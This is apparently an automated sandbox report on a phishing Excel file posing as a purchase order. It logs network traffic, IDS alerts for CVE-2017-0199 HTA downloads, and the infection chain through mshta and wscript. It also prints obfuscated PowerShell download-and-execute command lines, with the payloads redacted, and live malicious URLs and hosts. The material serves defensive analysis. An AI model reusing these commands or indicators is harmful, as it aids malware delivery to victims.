        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49174 -> 151.101.1.137:443
        Source: global trafficTCP traffic: 192.168.2.22:49163 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49163
        Source: global trafficTCP traffic: 192.168.2.22:49164 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49164
        Source: global trafficTCP traffic: 192.168.2.22:49165 -> 54.150.207.131:443
        Source: global trafficTCP traffic: 54.150.207.131:443 -> 192.168.2.22:49165
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49166
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.142.60:80
        Source: global trafficTCP traffic: 172.245.142.60:80 -> 192.168.2.22:49167

        Networking

        Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 172.245.142.60:80
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.142.60:80 -> 192.168.2.22:49166
        Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.142.60:80 -> 192.168.2.22:49164
        Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.1.137:443 -> 192.168.2.22:49174
        Source: unknownDNS query: name: paste.ee
        Source: global trafficHTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1Host: res.cloudinary.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 151.101.1.137 151.101.1.137
        Source: Joe Sandbox ViewIP Address: 54.150.207.131 54.150.207.131
        Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
        Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 172.245.142.60:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.245.142.60:80
        Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49173 -> 172.245.142.60:80
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: short.ruksk.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.142.60Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.245.142.60If-Range: "304ff-628d23aa8f80d"
        Source: global trafficHTTP traffic detected: GET /466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.142.60Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 09 Dec 2024 08:34:12 GMTConnection: Keep-AliveHost: 172.245.142.60If-None-Match: "304ff-628d23aa8f80d"
        Source: unknownHTTPS traffic detected: 151.101.1.137:443 -> 192.168.2.22:49174 version: TLS 1.0
        Source: unknownTCP traffic detected without corresponding DNS query: 172.245.142.60
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Code function: 7_2_000007FE899A7018 URLDownloadToFileW,7_2_000007FE899A7018
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\290A8C1.emf
        Source: global traffic
            HTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: short.ruksk.com
                Connection: Keep-Alive
        Source: global traffic
            HTTP traffic detected: GET /zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshift HTTP/1.1
                Accept: */*
                Accept-Language: fr-FR
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: short.ruksk.com
                Connection: Keep-Alive
        Source: global traffic
            HTTP traffic detected: GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                Host: res.cloudinary.com
                Connection: Keep-Alive
        Source: global traffic
            HTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 172.245.142.60
                Connection: Keep-Alive
        Source: global traffic
            HTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1
                Accept: */*
                Accept-Language: fr-FR
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Range: bytes=8896-
                Connection: Keep-Alive
                Host: 172.245.142.60
                If-Range: "304ff-628d23aa8f80d"
        Source: global traffic
            HTTP traffic detected: GET /466/kidsniceformetogetbackgreatthingswithnetiertimegivenmebestforme.tIF HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 172.245.142.60
                Connection: Keep-Alive
        Source: global traffic
            HTTP traffic detected: GET /466/wcc/matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta HTTP/1.1
                Accept: */*
                Accept-Language: fr-FR
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                If-Modified-Since: Mon, 09 Dec 2024 08:34:12 GMT
                Connection: Keep-Alive
                Host: 172.245.142.60
                If-None-Match: "304ff-628d23aa8f80d"
        Source: mshta.exe, 00000004.00000002.433675416.0000000002DED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.423893939.0000000002DEA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.426856568.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp
            String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: global traffic
            DNS traffic detected: DNS query: short.ruksk.com
        Source: global traffic
            DNS traffic detected: DNS query: res.cloudinary.com
        Source: global traffic
            DNS traffic detected: DNS query: paste.ee
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
        Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49165 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49165
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49174
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
        Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49174 -> 443
        Source: unknown | HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49163 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49165 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49171 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 54.150.207.131:443 -> 192.168.2.22:49172 version: TLS 1.2
        Source: C:\Windows\System32\mshta.exe | Window created: window name: CLIPBRDWNDCLASS

        System Summary

        Source: Process Memory Space: powershell.exe PID: 4092, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 3832, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
        Source: Orden_de_Compra_Nmero_6782929219.xls | OLE: Microsoft Excel 2007+
        Source: 54330000.0.dr | OLE: Microsoft Excel 2007+
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].hta
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'[base64 payload removed]'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = '[base64 payload removed]';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_000007FE89A7352E
        Source: Orden_de_Compra_Nmero_6782929219.xls | OLE indicator, VBA macros: true
        Source: 54330000.0.dr | OLE indicator, VBA macros: true
        Source: Orden_de_Compra_Nmero_6782929219.xlsStream path 'MBD00068A10/\x1Ole' : https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshifte+*ablk.yn'aKMnG`|M`&%rda</g*;[A-yci]%8)K@AP@B_vZaaG72ocZ6RKgZzxpLexRQAehYuWnE7H0kEQs9c2eh4a7pcJQ2fO1npjHV585RJ1Ia5ueBRN7aDy21TNJuvq1MvmyFBuq0KQRzcqvnvgqq6UQ1kWT?M4?E]K\`&K&
        Source: 54330000.0.drStream path 'MBD00068A10/\x1Ole' : https://short.ruksk.com/zxrudb?&mile=snotty&metro=workable&gastropod=available&monster=reflective&gearshifte+*ablk.yn'aKMnG`|M`&%rda</g*;[A-yci]%8)K@AP@B_vZaaG72ocZ6RKgZzxpLexRQAehYuWnE7H0kEQs9c2eh4a7pcJQ2fO1npjHV585RJ1Ia5ueBRN7aDy21TNJuvq1MvmyFBuq0KQRzcqvnvgqq6UQ1kWT?M4?E]K\`&K&
        Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
        Source: C:\Windows\System32\mshta.exe | Process created: Commandline size = 2095
        Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 2062
        Source: Process Memory Space: powershell.exe PID: 4092, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 3832, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine | Classification label: mal100.phis.troj.expl.evad.winXLS@38/51@23/3
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\54330000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR863F.tmp
        Source: Orden_de_Compra_Nmero_6782929219.xls | OLE indicator, Workbook stream: true
        Source: 54330000.0.dr | OLE indicator, Workbook stream: true
